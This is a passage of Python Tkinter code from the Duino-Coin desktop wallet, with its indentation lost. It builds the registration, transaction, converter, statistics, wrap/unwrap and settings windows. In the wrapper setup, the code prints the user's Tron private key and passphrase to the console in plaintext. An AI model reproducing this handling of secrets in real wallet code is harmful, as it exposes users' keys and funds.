register.destroy()
execl(sys.executable, sys.executable, *sys.argv)
else:
messagebox.showerror(
title=get_string("register_error"),
message=response[1])
else:
messagebox.showerror(
title=get_string("register_error"),
message=get_string("error_passwd_dont_match"))
else:
messagebox.showerror(
title=get_string("register_error"),
message=get_string("fill_the_blanks_warning"))
def _register_btn_clicked(self):
global username, password, confpassword, email, register
root.destroy()
register = Tk()
register.title(get_string("register"))
register.resizable(False, False)
TEXT_FONT_BOLD = Font(
register,
size=12,
weight="bold")
TEXT_FONT = Font(
register,
size=12,
weight="normal")
tos_warning = get_string("register_tos_warning")
import textwrap
tos_warning = textwrap.dedent(tos_warning)
tos_warning = "\n".join(l for line in tos_warning.splitlines()
for l in textwrap.wrap(line, width=20))
duco = ImageTk.PhotoImage(Image.open(resources + "duco.png"))
duco.image = duco
ducoLabel = Label(
register,
background=FOREGROUND_COLOR,
foreground=FONT_COLOR,
image=duco)
ducoLabel.grid(
row=0,
padx=5,
pady=(5, 0),
sticky="nswe")
ducoLabel2 = Label(
register,
background=FOREGROUND_COLOR,
foreground=FONT_COLOR,
text=get_string("register_on_network"),
font=TEXT_FONT_BOLD)
ducoLabel2.grid(row=1,
padx=5,
sticky="nswe")
def colorLabelBlue(handler):
ducoLabel3.configure(foreground="#6c5ce7")
def colorLabelNormal(handler):
ducoLabel3.configure(foreground=FONT_COLOR)
ducoLabel3 = Label(
register,
background=FOREGROUND_COLOR,
foreground=FONT_COLOR,
text=tos_warning,
font=TEXT_FONT)
ducoLabel3.grid(
row=2,
padx=5,
sticky="nswe")
ducoLabel3.bind("<Button-1>", openTos)
ducoLabel3.bind("<Enter>", colorLabelBlue)
ducoLabel3.bind("<Leave>", colorLabelNormal)
Label(
register,
text=get_string("username").upper(),
background=BACKGROUND_COLOR,
foreground=FONT_COLOR,
font=TEXT_FONT_BOLD,
).grid(
row=3,
sticky=W,
padx=5,
pady=(5, 0))
username = Entry(
register,
font=TEXT_FONT,
background=BACKGROUND_COLOR,
foreground=FOREGROUND_COLOR_SECONDARY)
username.grid(
row=4,
padx=5)
Label(
register,
text=get_string("passwd").upper(),
background=BACKGROUND_COLOR,
foreground=FONT_COLOR,
font=TEXT_FONT_BOLD,
).grid(
row=5,
sticky=W,
padx=5)
password = Entry(
register,
show="*",
font=TEXT_FONT,
background=BACKGROUND_COLOR,
foreground=FOREGROUND_COLOR_SECONDARY)
password.grid(
row=6,
padx=5)
Label(
register,
text=get_string("confirm_passwd").upper(),
background=BACKGROUND_COLOR,
foreground=FONT_COLOR,
font=TEXT_FONT_BOLD,
).grid(
row=7,
sticky=W,
padx=5)
confpassword = Entry(
register,
show="*",
font=TEXT_FONT,
background=BACKGROUND_COLOR,
foreground=FOREGROUND_COLOR_SECONDARY)
confpassword.grid(
row=8,
padx=5)
Label(
register,
text=get_string("email").upper(),
background=BACKGROUND_COLOR,
foreground=FONT_COLOR,
font=TEXT_FONT_BOLD,
).grid(
row=9,
sticky=W,
padx=5)
email = Entry(
register,
font=TEXT_FONT,
background=BACKGROUND_COLOR,
foreground=FOREGROUND_COLOR_SECONDARY)
email.grid(
row=10,
padx=5)
self.logbtn = Button(
register,
text=get_string("register"),
activebackground=BACKGROUND_COLOR,
foreground=FOREGROUND_COLOR,
background=BACKGROUND_COLOR,
command=self._registerprotocol,
font=TEXT_FONT_BOLD)
self.logbtn.grid(
columnspan=2,
sticky="nswe",
padx=(5, 5),
pady=(5, 5))
register.configure(background=BACKGROUND_COLOR)
def loading_window():
global loading, status
loading = Tk()
loading.resizable(False, False)
loading.configure(background=BACKGROUND_COLOR)
loading.title(get_string("loading"))
try:
loading.iconphoto(True,
PhotoImage(file=resources + "duco_color.png"))
except Exception:
pass
TEXT_FONT = Font(loading,
size=10,
weight="bold")
TEXT_FONT_BOLD = Font(loading,
size=14,
weight="bold")
original = Image.open(resources + "duco_color.png")
resized = original.resize((128, 128), Image.ANTIALIAS)
github = ImageTk.PhotoImage(resized)
github.image = github
githubLabel = Label(loading,
image=github,
background=BACKGROUND_COLOR,
foreground=FONT_COLOR)
githubLabel.grid(row=0,
column=0,
sticky=N + S + E + W,
pady=(5, 0),
padx=(5))
Label(
loading,
text=get_string("duino_coin_wallet"),
font=TEXT_FONT_BOLD,
foreground=FOREGROUND_COLOR,
background=BACKGROUND_COLOR,
).grid(
row=1,
column=0,
sticky=S + W,
pady=(5, 0),
padx=5)
loading.update()
status = Label(
loading,
background=BACKGROUND_COLOR,
foreground=FONT_COLOR,
text=get_string("loading_database"),
font=TEXT_FONT)
status.grid(
row=2,
column=0,
sticky=S + W,
pady=(0, 5),
padx=5)
loading.update()
def transactions_window(handler):
transactionsWindow = Toplevel()
transactionsWindow.resizable(False, False)
transactionsWindow.title(get_string("wallet_transactions"))
transactionsWindow.transient([root])
transactionsWindow.configure(background=BACKGROUND_COLOR)
TEXT_FONT_BOLD_LARGE = Font(
transactionsWindow,
size=14,
weight="bold")
TEXT_FONT = Font(
transactionsWindow,
size=12,
weight="normal")
Label(
transactionsWindow,
text=get_string("transaction_list"),
font=TEXT_FONT_BOLD_LARGE,
background=BACKGROUND_COLOR,
foreground=FOREGROUND_COLOR,
).grid(row=0,
column=0,
columnspan=2,
sticky=S + W,
pady=(5, 0),
padx=5)
Label(
transactionsWindow,
text=get_string("transaction_list_notice"),
font=TEXT_FONT,
background=BACKGROUND_COLOR,
foreground=FONT_COLOR,
).grid(row=1,
column=0,
columnspan=2,
sticky=S + W,
pady=(5, 0),
padx=5)
listbox = Listbox(
transactionsWindow,
width="35",
background=BACKGROUND_COLOR,
foreground=FONT_COLOR)
listbox.grid(
row=2,
column=0,
sticky=S + W + N + E,
padx=(5, 0),
pady=(0, 5))
scrollbar = Scrollbar(transactionsWindow,
background=BACKGROUND_COLOR)
scrollbar.grid(
row=2,
column=1,
sticky=N + S,
padx=(0, 5),
pady=(0, 5))
for i in gtxl:
listbox.insert(END, gtxl[i]["Sender"] + " to " + gtxl[i]
["Recipient"] + ": " + str(gtxl[i]["Amount"]) + " DUCO")
def get_selection(event):
try:
selection = listbox.curselection()[0]
openTransaction(gtxl[str(selection)]["Hash"])
except IndexError:
pass
listbox.bind("<Button-1>", get_selection)
listbox.config(yscrollcommand=scrollbar.set, font=TEXT_FONT)
scrollbar.config(command=listbox.yview)
def currency_converter_calc():
fromcurrency = fromCurrencyInput.get(fromCurrencyInput.curselection())
tocurrency = toCurrencyInput.get(toCurrencyInput.curselection())
amount = amountInput.get()
# TODO: only the DUCO -> fiat conversion below is implemented; the currencies
# selected above are fetched but not used yet
value = duco_fiat_value * float(amount)
result = get_string("result") + ": " + str(round(value, 6))
conversionresulttext.set(str(result))
calculatorWindow.update()
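# Worked example with illustrative numbers (the real rate comes from
# get_duco_price() elsewhere in this file): with duco_fiat_value = 0.0025 and
# an amount of 200 DUCO, value = 0.0025 * 200 = 0.5, so the result label reads
# "Result: 0.5" (using the localized "result" string).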
def currency_converter_window(handler):
global conversionresulttext
global fromCurrencyInput
global toCurrencyInput
global amountInput
global calculatorWindow
calculatorWindow = Toplevel()
calculatorWindow.resizable(False, False)
calculatorWindow.title(get_string("wallet_calculator"))
calculatorWindow.transient([root])
calculatorWindow.configure(background=BACKGROUND_COLOR)
TEXT_FONT_BOLD = Font(
calculatorWindow,
size=12,
weight="bold")
TEXT_FONT_BOLD_LARGE = Font(
calculatorWindow,
size=14,
weight="bold")
TEXT_FONT = Font(
calculatorWindow,
size=12,
weight="normal")
Label(
calculatorWindow,
text=get_string("currency_converter"),
font=TEXT_FONT_BOLD_LARGE,
foreground=FOREGROUND_COLOR,
background=BACKGROUND_COLOR,
).grid(row=0,
columnspan=2,
column=0,
sticky=S + W,
pady=5,
padx=5)
Label(
calculatorWindow,
text=get_string("from"),
font=TEXT_FONT_BOLD,
foreground=FOREGROUND_COLOR,
background=BACKGROUND_COLOR,
).grid(row=1,
column=0,
sticky=S + W,
padx=5)
fromCurrencyInput = Listbox(
calculatorWindow,
exportselection=False,
background=BACKGROUND_COLOR,
selectbackground=FOREGROUND_COLOR,
border="0",
font=TEXT_FONT,
foreground=FONT_COLOR,
width="20",
height="13",
)
fromCurrencyInput.grid(row=2,
column=0,
sticky=S + W,
padx=(5, 0))
fromCurrencyInput.insert(0, "DUCO")
vsb = Scrollbar(
calculatorWindow,
orient="vertical",
command=fromCurrencyInput.yview,
background=BACKGROUND_COLOR,
)
vsb.grid(row=2,
column=1,
sticky="ns",
padx=(0, 5))
fromCurrencyInput.configure(yscrollcommand=vsb.set)
fromCurrencyInput.select_set(0)
fromCurrencyInput.event_generate("<<ListboxSelect>>")
Label(
calculatorWindow,
text=get_string("to"),
font=TEXT_FONT_BOLD,
foreground=FOREGROUND_COLOR,
background=BACKGROUND_COLOR,
).grid(row=1,
column=3,
columnspan=2,
sticky=S + W,
padx=5)
toCurrencyInput = Listbox(
calculatorWindow,
exportselection=False,
background=BACKGROUND_COLOR,
selectbackground=FOREGROUND_COLOR,
border="0",
foreground=FONT_COLOR,
font=TEXT_FONT,
width="20",
height="13")
toCurrencyInput.grid(
row=2,
column=3,
sticky=S + W,
padx=(5, 0))
toCurrencyInput.insert(0, "USD")
vsb2 = Scrollbar(
calculatorWindow,
orient="vertical",
command=toCurrencyInput.yview,
background=BACKGROUND_COLOR,)
vsb2.grid(
row=2,
column=4,
sticky="ns",
padx=(0, 5))
toCurrencyInput.configure(yscrollcommand=vsb2.set)
toCurrencyInput.select_set(0)
toCurrencyInput.event_generate("<<ListboxSelect>>")
Label(
calculatorWindow,
text=get_string("input_amount"),
font=TEXT_FONT_BOLD,
foreground=FOREGROUND_COLOR,
background=BACKGROUND_COLOR,
).grid(row=3,
columnspan=2,
column=0,
sticky=S + W,
padx=5)
def clear_ccamount_placeholder(self):
amountInput.delete("0", "100")
amountInput = Entry(
calculatorWindow,
foreground=FOREGROUND_COLOR_SECONDARY,
border="0",
font=TEXT_FONT,
background=BACKGROUND_COLOR,)
amountInput.grid(
row=4,
column=0,
sticky=N + S + W + E,
padx=5,
columnspan=2,
pady=(0, 5))
amountInput.insert("0", str(global_balance))
amountInput.bind("<FocusIn>", clear_ccamount_placeholder)
Button(
calculatorWindow,
text=get_string("calculate"),
font=TEXT_FONT_BOLD,
foreground=FOREGROUND_COLOR,
activebackground=BACKGROUND_COLOR,
background=BACKGROUND_COLOR,
command=currency_converter_calc,
).grid(row=3,
columnspan=2,
column=2,
sticky=N + S + W + E,
pady=(5, 0),
padx=5)
conversionresulttext = StringVar(calculatorWindow)
conversionresulttext.set(get_string("result") + ": 0.0")
conversionresultLabel = Label(
calculatorWindow,
textvariable=conversionresulttext,
font=TEXT_FONT_BOLD,
background=BACKGROUND_COLOR,
foreground=FONT_COLOR,)
conversionresultLabel.grid(
row=4,
columnspan=2,
column=2,
pady=(0, 5))
calculatorWindow.mainloop()
def statistics_window(handler):
statsApi = get(
"https://server.duinocoin.com"
+ "/api.json",
data=None)
if statsApi.status_code == 200: # Check for response
statsApi = statsApi.json()
miner_api = get(
"https://server.duinocoin.com"
+ "/miners.json",
data=None)
if miner_api.status_code == 200: # Check for response
miner_api = miner_api.json()
statsWindow = Toplevel()
statsWindow.resizable(False, False)
statsWindow.title(get_string("statistics_title"))
statsWindow.transient([root])
statsWindow.configure(background=BACKGROUND_COLOR)
TEXT_FONT_BOLD_LARGE = Font(
statsWindow,
size=14,
weight="bold")
TEXT_FONT = Font(
statsWindow,
size=12,
weight="normal")
Active_workers_listbox = Listbox(
statsWindow,
exportselection=False,
background=BACKGROUND_COLOR,
foreground=FONT_COLOR,
border="0",
font=TEXT_FONT,
width="65",
height="8",)
Active_workers_listbox.grid(
row=1,
columnspan=2,
sticky=N + E + S + W,
pady=(0, 5),
padx=5)
i = 0
totalHashrate = 0
for threadid in miner_api:
if username in miner_api[threadid]["User"]:
rigId = miner_api[threadid]["Identifier"]
if rigId == "None":
rigId = ""
else:
rigId += ": "
software = miner_api[threadid]["Software"]
hashrate = str(round(miner_api[threadid]["Hashrate"], 2))
totalHashrate += float(hashrate)
difficulty = str(miner_api[threadid]["Diff"])
shares = (
str(miner_api[threadid]["Accepted"])
+ "/"
+ str(
miner_api[threadid]["Accepted"]
+ miner_api[threadid]["Rejected"]))
Active_workers_listbox.insert(
i,
"#"
+ str(i + 1)
+ ": "
+ rigId
+ software
+ " "
+ str(round(float(hashrate) / 1000, 2))
+ " kH/s @ diff "
+ difficulty
+ ", "
+ shares)
i += 1
if i == 0:
Active_workers_listbox.insert(
i, get_string("statistics_miner_warning"))
totalHashrateString = str(int(totalHashrate)) + " H/s"
if totalHashrate > 1000000000:
totalHashrateString = str(
round(totalHashrate / 1000000000, 2)) + " GH/s"
elif totalHashrate > 1000000:
totalHashrateString = str(round(totalHashrate / 1000000, 2)) + " MH/s"
elif totalHashrate > 1000:
totalHashrateString = str(round(totalHashrate / 1000, 2)) + " kH/s"
Active_workers_listbox.configure(height=i)
Active_workers_listbox.select_set(32)
Active_workers_listbox.event_generate("<<ListboxSelect>>")
Label(
statsWindow,
text=get_string("your_miners") + " - " + totalHashrateString,
font=TEXT_FONT_BOLD_LARGE,
foreground=FOREGROUND_COLOR,
background=BACKGROUND_COLOR,
).grid(
row=0,
column=0,
columnspan=2,
sticky=S + W,
pady=5,
padx=5)
Label(
statsWindow,
text=get_string("richlist"),
font=TEXT_FONT_BOLD_LARGE,
foreground=FOREGROUND_COLOR,
background=BACKGROUND_COLOR,
).grid(
row=2,
column=0,
sticky=S + W,
pady=5,
padx=5)
Top_10_listbox = Listbox(
statsWindow,
exportselection=False,
border="0",
font=TEXT_FONT,
width="30",
height="10",
background=BACKGROUND_COLOR,
foreground=FONT_COLOR)
Top_10_listbox.grid(
row=3,
column=0,
rowspan=10,
sticky=N + E + S + W,
pady=(0, 5),
padx=5)
num = 0
for i in statsApi["Top 10 richest miners"]:
Top_10_listbox.insert(num, i)
num += 1
Top_10_listbox.select_set(32)
Top_10_listbox.event_generate("<<ListboxSelect>>")
Label(
statsWindow,
text=get_string("network_info"),
font=TEXT_FONT_BOLD_LARGE,
foreground=FOREGROUND_COLOR,
background=BACKGROUND_COLOR,
).grid(row=2,
column=1,
sticky=S + W,
padx=5,
pady=5)
Label(
statsWindow,
text=get_string("difficulty")
+ ": "
+ str(statsApi["Current difficulty"]),
font=TEXT_FONT,
background=BACKGROUND_COLOR,
foreground=FONT_COLOR,
).grid(row=3,
column=1,
sticky=S + W,
padx=5)
Label(
statsWindow,
text=get_string("mined_blocks")
+ ": "
+ str(statsApi["Mined blocks"]),
font=TEXT_FONT,
background=BACKGROUND_COLOR,
foreground=FONT_COLOR,
).grid(row=4,
column=1,
sticky=S + W,
padx=5)
Label(
statsWindow,
text=get_string("network_hashrate")
+ ": "
+ str(statsApi["Pool hashrate"]),
font=TEXT_FONT,
background=BACKGROUND_COLOR,
foreground=FONT_COLOR,
).grid(row=5,
column=1,
sticky=S + W,
padx=5)
Label(
statsWindow,
text=get_string("active_miners")
+ ": "
+ str(len(statsApi["Miners"])),
font=TEXT_FONT,
background=BACKGROUND_COLOR,
foreground=FONT_COLOR,
).grid(row=6,
column=1,
sticky=S + W,
padx=5)
Label(
statsWindow,
text="1 DUCO "
+ get_string("estimated_price")
+ ": $"
+ str(statsApi["Duco price"]),
font=TEXT_FONT,
background=BACKGROUND_COLOR,
foreground=FONT_COLOR,
).grid(row=7,
column=1,
sticky=S + W,
padx=5)
Label(
statsWindow,
text=get_string("registered_users")
+ ": "
+ str(statsApi["Registered users"]),
font=TEXT_FONT,
background=BACKGROUND_COLOR,
foreground=FONT_COLOR,
).grid(row=8,
column=1,
sticky=S + W,
padx=5)
Label(
statsWindow,
text=get_string("mined_duco")
+ ": "
+ str(statsApi["All-time mined DUCO"])
+ " ᕲ",
font=TEXT_FONT,
background=BACKGROUND_COLOR,
foreground=FONT_COLOR,
).grid(row=9,
column=1,
sticky=S + W,
padx=5)
statsWindow.mainloop()
def wrapper_window(handler):
def Wrap():
amount = amountWrap.get()
print("Got amount:", amount)
print("pub key:", pub_key)
soc = websocket.create_connection(WS_URI)
soc.recv().decode()
try:
float(amount)
except Exception:
pass
else:
soc.send(bytes(
"LOGI,"
+ str(username)
+ ","
+ str(password),
encoding="utf8"))
_ = soc.recv().decode()
soc.send(
bytes(
"WRAP,"
+ str(amount)
+ ","
+ str(pub_key)
+ str(",placeholder"),
encoding="utf8"))
soc.close()
sleep(2)
wrapperWindow.quit()
try:
pubkeyfile = open(str(resources + "DUCOPubKey.pub"), "r")
except Exception:
messagebox.showerror(
title=get_string("wrapper_error_title"),
message=get_string("wrapper_error"))
else:
if TRONPY_ENABLED:
pub_key = pubkeyfile.read()
pubkeyfile.close()
wrapperWindow = Toplevel()
wrapperWindow.resizable(False, False)
wrapperWindow.title(get_string("wrapper_title"))
wrapperWindow.transient([root])
askWrapAmount = Label(
wrapperWindow,
text=get_string("wrapper_amount_to_wrap") + ":")
askWrapAmount.grid(row=0,
column=0,
sticky=N + W)
amountWrap = Entry(wrapperWindow,
border="0",
font=Font(size=15))
amountWrap.grid(row=1,
column=0,
sticky=N + W)
wrapButton = Button(wrapperWindow,
text="Wrap",
command=Wrap)
wrapButton.grid(row=2,
column=0,
sticky=N + W)
else:
messagebox.showerror(
title=get_string("wrapper_error_title"),
message=get_string("wrapper_error_tronpy"))
def unwrapper_window(handler):
def UnWrap():
pubkeyfile = open(str(resources + "DUCOPubKey.pub"), "r")
pub_key = pubkeyfile.read()
pubkeyfile.close()
passphrase = passphraseEntry.get()
privkeyfile = open(str(resources + "DUCOPrivKey.encrypt"), "r")
privKeyEnc = privkeyfile.read()
privkeyfile.close()
try:
priv_key = password_decrypt(privKeyEnc, passphrase).decode()
use_wrapper = True
except InvalidToken:
print(get_string("invalid_passphrase"))
use_wrapper = False
amount = amountUnWrap.get()
print("Got amount:", amount)
soc = websocket.create_connection(WS_URI)
soc.recv().decode()
try:
float(amount)
except Exception:
pass
else:
soc.send(bytes(
"LOGI,"
+ str(username)
+ ","
+ str(password), encoding="utf8"))
_ = soc.recv().decode()
if use_wrapper:
pendingvalues = wduco.functions.pendingWithdrawals(
pub_key, username)
# the transaction hasn't been initiated yet, but the variable must exist
# before the checks below
txn_success = False
try:
amount = float(amount)
except ValueError:
print("Value should be numeric - aborting")
else:
if int(float(amount) * 10 ** 6) >= pendingvalues:
toInit = int(float(amount) * 10 ** 6) - pendingvalues
else:
toInit = amount * 10 ** 6
if toInit > 0:
txn = (
wduco.functions.initiateWithdraw(username, toInit)
.with_owner(pub_key)
.fee_limit(5_000_000)
.build()
.sign(PrivateKey(bytes.fromhex(priv_key))))
txn = txn.broadcast()
txnfeedback = txn.result()
if txnfeedback:
txn_success = True
else:
txn_success = False
if txn_success or amount <= pendingvalues:
soc.send(
bytes(
"UNWRAP,"
+ str(amount)
+ ","
+ str(pub_key)
+ str(",placeholder"),
encoding="utf8"))
soc.close()
sleep(2)
unWrapperWindow.quit()
try:
pubkeyfile = open(str(resources + "DUCOPubKey.pub"), "r")
pubkeyfile.read()
pubkeyfile.close()
except Exception:
messagebox.showerror(
title=get_string("wrapper_error_title"),
message=get_string("wrapper_error"))
else:
if TRONPY_ENABLED:
unWrapperWindow = Toplevel()
unWrapperWindow.resizable(False, False)
unWrapperWindow.title(get_string("unwrapper_title"))
unWrapperWindow.transient([root])
unWrapperWindow.configure()
askAmount = Label(
unWrapperWindow,
text=get_string("unwrap_amount"))
askAmount.grid(row=1,
column=0,
sticky=N + W)
amountUnWrap = Entry(
unWrapperWindow,
border="0",
font=Font(size=15))
amountUnWrap.grid(row=2,
column=0,
sticky=N + W)
askPassphrase = Label(
unWrapperWindow,
text=get_string("ask_passphrase"))
askPassphrase.grid(row=4,
column=0,
sticky=N + W)
passphraseEntry = Entry(
unWrapperWindow,
border="0",
font=Font(size=15))
passphraseEntry.grid(
row=5,
column=0,
sticky=N + W)
wrapButton = Button(
unWrapperWindow,
text=get_string("unwrap_duco"),
command=UnWrap)
wrapButton.grid(
row=7,
column=0,
sticky=N + W)
else:
messagebox.showerror(
title=get_string("wrapper_error"),
message=get_string("wrapper_error_tronpy"))
def settings_window(handler):
def _wrapperconf():
if TRONPY_ENABLED:
privkey_input = StringVar()
passphrase_input = StringVar()
wrapconfWindow = Toplevel()
wrapconfWindow.resizable(False, False)
wrapconfWindow.title(get_string("wrapper_title"))
wrapconfWindow.transient([root])
wrapconfWindow.configure()
def setwrapper():
if privkey_input and passphrase_input:
priv_key = privkey_entry.get()
print("Got priv key:", priv_key)
passphrase = passphrase_entry.get()
print("Got passphrase:", passphrase)
try:
pub_key = PrivateKey(
bytes.fromhex(priv_key)
).public_key.to_base58check_address()
except Exception:
pass
else:
print("Saving data")
privkeyfile = open(
str(resources + "DUCOPrivKey.encrypt"), "w")
privkeyfile.write(
str(password_encrypt(
priv_key.encode(), passphrase
).decode()))
privkeyfile.close()
pubkeyfile = open(
str(resources + "DUCOPubKey.pub"), "w")
pubkeyfile.write(pub_key)
pubkeyfile.close()
Label(wrapconfWindow, text=get_string(
"wrapper_success")).pack()
wrapconfWindow.quit()
title = Label(
wrapconfWindow,
text=get_string("wrapper_config_title"),
font=Font(size=20))
title.grid(row=0,
column=0,
sticky=N + W,
padx=5)
askprivkey = Label(
wrapconfWindow,
text=get_string("ask_private_key"))
askprivkey.grid(row=1,
column=0,
sticky=N + W)
privkey_entry = Entry(
wrapconfWindow,
font=TEXT_FONT,
textvariable=privkey_input)
privkey_entry.grid(row=2,
column=0,
sticky=N + W)
askpassphrase = Label(wrapconfWindow,
text=get_string("passphrase"))
askpassphrase.grid(row=3,
column=0,
sticky=N + W)
passphrase_entry = Entry(
wrapconfWindow,
font=TEXT_FONT,
textvariable=passphrase_input)
passphrase_entry.grid(row=4,
column=0,
sticky=N + W)
wrapConfigButton = Button(
wrapconfWindow,
text=get_string("configure_wrapper_lowercase"),
command=setwrapper)
wrapConfigButton.grid(row=5,
column=0,
sticky=N + W)
wrapconfWindow.mainloop()
else:
messagebox.showerror(
title=get_string("wrapper_error"),
message=get_string("wrapper_error_tronpy"))
def _logout():
try:
with sqlconn(resources + "wallet.db") as con:
cur = con.cursor()
cur.execute("DELETE FROM UserData")
con.commit()
except Exception as e:
print(e)
try:
execl(sys.executable, sys.executable, *sys.argv)
except Exception as e:
print(e)
def _cleartrs():
with sqlconn(resources + "wallet.db") as con:
cur = con.cursor()
cur.execute("DELETE FROM transactions")
con.commit()
def _chgpass():
def _changepassprotocol():
oldpasswordS = oldpassword.get()
newpasswordS = newpassword.get()
confpasswordS = confpassword.get()
if oldpasswordS != newpasswordS:
if oldpasswordS and newpasswordS and confpasswordS:
if newpasswordS == confpasswordS:
soc = websocket.create_connection(WS_URI)
soc.recv().decode()
soc.send(
bytes(
"LOGI,"
+ str(username)
+ ","
+ str(password), encoding="utf8"))
soc.recv().decode()
soc.send(
bytes(
"CHGP,"
+ str(oldpasswordS)
+ ","
+ str(newpasswordS),
encoding="utf8"))
response = soc.recv().decode().rstrip("\n").split(",")
soc.close()
if not "OK" in response[0]:
messagebox.showerror(
title=get_string("change_passwd_error"),
message=response[1])
else:
messagebox.showinfo(
title=get_string("change_passwd_ok"),
message=response[1])
try:
try:
with sqlconn(
resources + "wallet.db"
) as con:
cur = con.cursor()
cur.execute("DELETE FROM UserData")
con.commit()
except Exception as e:
print(e)
except FileNotFoundError:
pass
execl(sys.executable, sys.executable, *sys.argv)
else:
messagebox.showerror(
title=get_string("change_passwd_error"),
message=get_string("error_passwd_dont_match"))
else:
messagebox.showerror(
title=get_string("change_passwd_error"),
message=get_string("fill_the_blanks_warning"))
else:
messagebox.showerror(
title=get_string("change_passwd_error"),
message=get_string("same_passwd_error"))
settingsWindow.destroy()
changepassWindow = Toplevel()
changepassWindow.title(get_string("change_passwd_lowercase"))
changepassWindow.resizable(False, False)
changepassWindow.transient([root])
changepassWindow.configure(background=BACKGROUND_COLOR)
TEXT_FONT_BOLD = Font(changepassWindow, size=12, weight="bold")
TEXT_FONT = Font(changepassWindow, size=12, weight="normal")
Label(
changepassWindow,
text=get_string("old_passwd"),
font=TEXT_FONT_BOLD,
background=BACKGROUND_COLOR,
foreground=FONT_COLOR,
).grid(row=0,
sticky=W,
padx=5)
oldpassword = Entry(
changepassWindow,
show="*",
font=TEXT_FONT,
foreground=FOREGROUND_COLOR_SECONDARY,
background=BACKGROUND_COLOR)
oldpassword.grid(row=1,
sticky="nswe",
padx=5)
Label(
changepassWindow,
text=get_string("new_passwd"),
font=TEXT_FONT_BOLD,
background=BACKGROUND_COLOR,
foreground=FONT_COLOR,
).grid(row=2,
sticky=W,
padx=5)
newpassword = Entry(
changepassWindow,
show="*",
font=TEXT_FONT,
foreground=FOREGROUND_COLOR_SECONDARY,
background=BACKGROUND_COLOR)
newpassword.grid(row=3,
sticky="nswe",
padx=5)
Label(
changepassWindow,
text=get_string("confirm_new_passwd"),
font=TEXT_FONT_BOLD,
background=BACKGROUND_COLOR,
foreground=FONT_COLOR,
).grid(row=4,
sticky=W,
padx=5)
confpassword = Entry(
changepassWindow,
show="*",
font=TEXT_FONT,
foreground=FOREGROUND_COLOR_SECONDARY,
background=BACKGROUND_COLOR)
confpassword.grid(row=5,
sticky="nswe",
padx=5)
chgpbtn = Button(
changepassWindow,
text=get_string("change_passwd"),
command=_changepassprotocol,
foreground=FOREGROUND_COLOR,
font=TEXT_FONT_BOLD,
background=BACKGROUND_COLOR,
activebackground=BACKGROUND_COLOR)
chgpbtn.grid(columnspan=2,
sticky="nswe",
pady=5,
padx=5)
settingsWindow = Toplevel()
settingsWindow.resizable(False, False)
settingsWindow.title(get_string("settings_title"))
settingsWindow.transient([root])
settingsWindow.configure(background=BACKGROUND_COLOR)
TEXT_FONT = Font(
settingsWindow,
size=12,
weight="normal")
TEXT_FONT_BOLD_LARGE = Font(
settingsWindow,
size=12,
weight="bold")
Label(
settingsWindow,
text=get_string("uppercase_settings"),
font=TEXT_FONT_BOLD_LARGE,
foreground=FOREGROUND_COLOR,
background=BACKGROUND_COLOR,
).grid(row=0,
column=0,
columnspan=4,
sticky=S + W,
pady=(5, 5),
padx=(5, 0))
logoutbtn = Button(
settingsWindow,
text=get_string("logout"),
command=_logout,
font=TEXT_FONT,
background=BACKGROUND_COLOR,
activebackground=BACKGROUND_COLOR,
foreground=FONT_COLOR)
logoutbtn.grid(row=1,
column=0,
columnspan=4,
sticky="nswe",
padx=5)
chgpassbtn = Button(
settingsWindow,
text=get_string("change_passwd"),
command=_chgpass,
font=TEXT_FONT,
background=BACKGROUND_COLOR,
activebackground=BACKGROUND_COLOR,
foreground=FONT_COLOR)
chgpassbtn.grid(row=2,
column=0,
columnspan=4,
sticky="nswe",
padx=5)
wrapperconfbtn = Button(
settingsWindow,
text=get_string("configure_wrapper"),
command=_wrapperconf,
font=TEXT_FONT,
background=BACKGROUND_COLOR,
activebackground=BACKGROUND_COLOR,
foreground=FONT_COLOR)
wrapperconfbtn.grid(row=3,
column=0,
columnspan=4,
sticky="nswe",
padx=5)
cleartransbtn = Button(
settingsWindow,
text=get_string("clear_transactions"),
command=_cleartrs,
font=TEXT_FONT,
background=BACKGROUND_COLOR,
activebackground=BACKGROUND_COLOR,
foreground=FONT_COLOR)
cleartransbtn.grid(row=4,
column=0,
columnspan=4,
sticky="nswe",
padx=5)
separator = ttk.Separator(settingsWindow, orient="horizontal")
separator.grid(
row=5,
column=0,
columnspan=4,
sticky=N + S + E + W,
padx=(5, 5),
pady=5)
Label(
settingsWindow,
text=get_string("logged_in_as")
+ ": "
+ str(username),
font=TEXT_FONT,
background=BACKGROUND_COLOR,
foreground=FONT_COLOR,
).grid(
row=6,
column=0,
columnspan=4,
padx=5,
sticky=S + W)
Label(
settingsWindow,
text=get_string("wallet_version")
+ ": "
+ str(VERSION),
font=TEXT_FONT,
background=BACKGROUND_COLOR,
foreground=FONT_COLOR,
).grid(
row=7,
column=0,
columnspan=4,
padx=5,
sticky=S + W)
Label(
settingsWindow,
text=get_string("translation_author_message")
+ " "
+ get_string("translation_author"),
font=TEXT_FONT,
background=BACKGROUND_COLOR,
foreground=FONT_COLOR,
).grid(
row=8,
column=0,
columnspan=4,
padx=5,
sticky=S + W)
Label(
settingsWindow,
text=get_string("config_dev_warning"),
font=TEXT_FONT,
background=BACKGROUND_COLOR,
foreground=FONT_COLOR,
).grid(
row=9,
column=0,
columnspan=4,
padx=5,
sticky=S + W)
separator = ttk.Separator(settingsWindow, orient="horizontal")
separator.grid(
row=10,
column=0,
columnspan=4,
sticky=N + S + E + W,
padx=(5, 5),
pady=5)
original = Image.open(resources + "duco.png")
resized = original.resize((48, 48), Image.ANTIALIAS)
website = ImageTk.PhotoImage(resized)
website.image = website
websiteLabel = Label(
settingsWindow,
image=website,
background=BACKGROUND_COLOR,
foreground=FONT_COLOR)
websiteLabel.grid(
row=11,
column=0,
sticky=N + S + E + W,
padx=(5, 0),
pady=(0, 5))
websiteLabel.bind("<Button-1>", openWebsite)
original = Image.open(resources + "github.png")
resized = original.resize((48, 48), Image.ANTIALIAS)
github = ImageTk.PhotoImage(resized)
github.image = github
githubLabel = Label(
settingsWindow,
image=github,
background=BACKGROUND_COLOR,
foreground=FONT_COLOR)
githubLabel.grid(
row=11,
column=1,
sticky=N + S + E + W,
pady=(0, 5))
githubLabel.bind("<Button-1>", openGitHub)
original = Image.open(resources + "exchange.png")
resized = original.resize((48, 48), Image.ANTIALIAS)
exchange = ImageTk.PhotoImage(resized)
exchange.image = exchange
exchangeLabel = Label(
settingsWindow,
image=exchange,
background=BACKGROUND_COLOR,
foreground=FONT_COLOR)
exchangeLabel.grid(
row=11,
column=2,
sticky=N + S + E + W,
pady=(0, 5))
exchangeLabel.bind("<Button-1>", openExchange)
